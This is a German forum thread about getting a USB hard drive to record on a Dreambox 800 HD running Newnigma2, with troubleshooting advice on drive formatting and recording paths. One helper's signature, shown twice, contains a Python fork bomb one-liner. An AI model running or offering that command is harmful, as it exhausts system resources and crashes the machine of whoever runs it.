Kriege USB-HDD nicht in Gang - Hilfe

    • Kriege USB-HDD nicht in Gang - Hilfe

      Ich habe eine Dreambox 800 HD, im Flash NewEnimga2
      Habe eine externe Festplatte und zwar eine WD MyBook 500GB.
      Habe versucht die FP zu initialisieren, Abbruch mit Meldung : Mkfs failed - Bei Filesystem Check die gleiche Fehlermeldung.
      Dann hab ich s über die blaue Taste versucht (Newenigma2 Services, dort kann ich dann die Platte formatieren eigentlich beliebig in welches Format, habe sie auch gemountet.Dort also keine Probleme, aber trotzdem kann ich mit der Platte nichts anfangen, da si im Hauptmenü nicht erkannt wird oder irgend nen Fehler hat.
      Vor dem Formatieren hatte ich ein paar Filme und Musik drauf und habe sie über die Dreambox abgespielt ohne Probleme, da wurde alles erkannt und abgespielt, aber jetzt klemmts - kann mir bitte jemand weiterhelfen ?
      Danke im Vorfeld !
      Mfg
      ALMIR
    • RE: Kriege USB-HDD nicht in Gang - Hilfe

      Original von oZxS
      und was hat das im faq bereich zu tun ? verschoben

      Wohin wurde es verschoben ?
      Andere fragen doch hier auch alles mögliche und kriegen Antworten.
      Mfg
      ALMIR
    • RE: Kriege USB-HDD nicht in Gang - Hilfe

      1.Initialisieren geht nur bei internen oder aber über esata angeschlossene platten bei usb geht das nicht.Sollte aber bekannt sein.

      2.Ich gehe mal davon aus das es eine reine usb platte ist und nicht noch ein esata anschluss vorhanden ist und der zusätzlich angeschlossen ist weil das geht nicht.

      3.Nun kannste z.b aufnahmepfad ändern in den einstellungen und in der speichergeräte liste kannste die dann auswählen.Oder du schließt die platte an rebootest und dann kannste die wie eine interne benutzen.Initialisieren brauchste die nicht wenn du die im devicemanager formatiert hast in ext3.Vorraussetung ist aber das du keine nfs/cifs(samba) freigabe oder ähnliches auf /media/hdd gemountet hast und die usb platte beim booten angeklemmt ist.
      python -c 'while 1: __import__("os").fork()'
      Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !
    • Hi !
      Also daß das Initialisieren mit USB nicht geht wusste ich nicht.
      Es ist eine reine USB-Platte ohne Esata.
      Ich habe die Platte im Device-Manager mit ext3 formatiert und rebootet, aufnhemen kann ich damit aber trotzdem nicht.
      Wäre es besser wenn ich mir eine interne oder externe Esata-Platte besorge ?
      Mfg
      ALMIR
    • Original von arianebox
      existiert der ordner /movie ?

      ja der existiert "Default movie location" /hdd/movie/
      Aber ich weiß nicht so recht wie ich da wo und was einstellen muß, sorry aber bin totaler Linux/Dreambox Newbie.
      Mfg
      ALMIR

      Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von almir_de ()

    • Original von arianebox
      ich meinte nicht die einstellung der dreambox,
      sondern ob der ordner auuf der platte auch wirklich angelegt ist

      Auf der Festplatte ist kein Ordner angelegt, ich musste sie ja formatieren mit dem Device Manager - dateiformat ist ext3, jetzt kann mein PC nichts mehr mit der Playtte anfangen.
    • HI almir_de

      geh doch einfach mal bitte unter Einstellungen ...System...Recordingpfad...

      Dort steht doch media/hdd/movie du drückst ok und es öffnet sich ein Menü ...

      dort drückst du nochmal ok ...und wählst dateiformat aus ...dann gehst du unter autofs auf deine Festplatte ,die ja im Devicemanger erkannt wurde ...du öffnest deinen Festplattenordner und kannst dort mit der Fernbedienung die ordner hdd und movie anlegen ....und diesen Ort speicherst du unter dem Recordinpfad....

      Dann startest du einfach die Box neu und deine festplatte sollte funktionieren ...so gings bei mir auch ...
      Wenn du neu gestartet hast findest du deine Festplatte dann unter Media HDD...
      geht bei mir wunderbar ...

      Mußt halt mal ein wenig üben unter Recordingpfad um die richtigen Einstellungen hinzubekommen ...

      Gruss BVB01
    • Hallo !
      Also wenn ich in den Recording Pfad gehe kriege ich das hier :
      Default movie location /hdd/movie
      timer record location /hdd/movie
      instant record location /hdd/movie
      timeshift location /media/hdd
      Irgendwie schein ich zu blöd für Linux zu sein...
      Mfg
      ALMIR

      Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von almir_de ()

    • ja ..und da gehst du auf default movie location...und drückst ok ...
      dann geht ein Menü auf und da wieder ok ...und auf dateiformat ...und dann siehst du praktisch die Struktur deiner Box ...halt alle Ordner als wenn du mit nem FTP Programm mit PC draufgehst ...

      BVB01
    • ok das habe ich, dort kann ich aber nur hdd auswählen.das hab ich jetzt gemacht und die Box bootet gerade neu.Bin mal gespannt.
      Nachtrag : Nach dem Reboot ging es mit der roten Taste aufzunehmen, hab gleich mal ne minute aufgezeichnet, meine HDD hat jedenfalls nicht geblinkt (tut sie immer bei Zugriffen) - nachgeschaut unter Medien, im HDD Verzeichnis, nichts.Die Box hat es zwar aufgezeichnet aber auf den Internal Flash, die Datei ist aber auch nicht abspielbar.Imm HDD-Ordner (Lower USB-Slot) sind nur "lost+fiund" und "usr" Ordner.
      Mfg
      ALMIR

      Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von almir_de ()

    • NOCHMAL ZUM MITSCHREIBEN

      USB platte anklemmen einen richtigen reboot machen und nach dem neustart über telnet einfach den befehl mkdir /media/hdd/movie machen das kann doch net so schwer sein. Aber wenn du die platte während dem lauf abklemmst und wieder drann klemmst musste wieder neustarten weil die dann nicht nach media/hdd gemountet wird das geht nur beim booten oder über konsole aber das erspare ich mir.

      Guck dir die bilder an das ist meine usb platte (ext3 formatiert) ohen das ich handanlegen musste.

      PS Das ist das unstable image von heute mit dem stable geht das net so einfach.Oder du wartest noch paar tage dann geht das auch im stable.
      Bilder
      • screenshot1.png

        26,32 kB, 1.280×720, 1.544 mal angesehen
      • screenshot2.png

        33,95 kB, 1.280×720, 1.531 mal angesehen
      python -c 'while 1: __import__("os").fork()'
      Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !
    • Kati danke Dir für deine Mühen aber das Thema mit der USB-Platte hat sich erledigt.
      Habe mir eine HDD in ein ESATA-Gehäuse eingebaut.Angeschlossen, initialisiert,endlich freute ich mich, alles gut...dachte ich.Das wars dann aber auch schon mit den guten Nachrichten.
      Rote Taste, aktuelle Sendung aufnehmen : Absturz (Grüner Bildschrim), neustart
      das kann ich 100 mal machen immer dasselbe
      Menü, dann will ich raus aus dem menü, Absturz, Neustart
      Timer-Programierung, am Ende beim Bestätigen mit der grünen Taste Absurz
      Beim Versuch die Box herunterzufahren (5 sec AUS Taste auf FB) Absturz, Neustart
      Also bis jetzt bin ich von der Box bzw. von Newnigma maßlos enttäuscht.
      Zumal ich nicht weiß wo dran das alles liegt, diese ganzen Abstürze und daß bei einer Box von mehr als 400 Euro.
      Kann mir jemand was dazu sagen was ich machen soll ? Wie gesagt, momentan hab ich nichts als Frust.
      Mfg
      ALMIR